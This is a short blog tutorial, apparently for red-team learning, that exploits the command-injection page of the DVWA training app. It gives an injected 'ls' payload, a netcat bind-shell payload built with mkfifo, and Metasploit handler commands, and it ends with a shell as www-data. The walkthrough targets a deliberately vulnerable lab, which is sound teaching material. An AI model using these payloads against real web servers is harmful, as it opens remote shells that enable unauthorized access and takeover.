Did you know that you can navigate the posts by swiping left and right?

Exploiting Command Injection vulnerabilities

18 Apr 2017 . category: tech . Comments
#redteam #kali #dvwa #metasploit

Command Injection is the manipulation of a vulnerable software in order to execute arbitrary commands on the host operating system. Command Injections are possible when the application skips the input validation and uses it for executing a shell command on the host operating system. in this post we’ll get our hands on DVWA’s Command Injection section, and we’ll open a backdoor on the server using Metasploit.

Visit the Command Injection section of DVWA.

ci-0

The page says that it will ping an IP address for us, so let’s see what will do for the IP 127.0.0.1:

ci-1

Now, let’s try to append a list bash command after our input IP address:


127.0.0.1; ls

ci-2

Sweet, DVWA simply appends our input to the underlying bash command!

Now, let’s listen on port 4444 using netcat and redirect all the incoming bytes to a bash shell:


127.0.0.1; mkfifo /tmp/pipe ; sh /tmp/pipe | nc -l -p 4444 > /tmp/pipe

ci-3

As you will notice, the page is loading forever, which means that our backdoor is open and waiting for us… :smile:

Let’s start msfconsole and open the shell on the server:


⁠⁠⁠msfconsole
use exploit/multi/handler
set payload linux/x64/shell/bind_tcp
set RHOST 127.0.0.1

ci-4

Note that we didn’t set the LPORT of bind_tcp, since the default one is 4444.

As you can see, we are the www-data user, and that’s why we can’t read the /etc/shadow file, which contains the user passwords of the operating system. But, we have all the privileges that www-data user has and we can e.g. modify DVWA or escalate to root, by exploiting a local privilege escalation vulnerability.

Happy binding!


Me

Panos is on a mission to protect what you ❤️ by delivering products that utilize cryptographic principles and respect the privacy of their users. In the past he did research in Computer Security and Machine Learning and currently he works as a Software Engineer for Office 365, focusing on Security Engineering.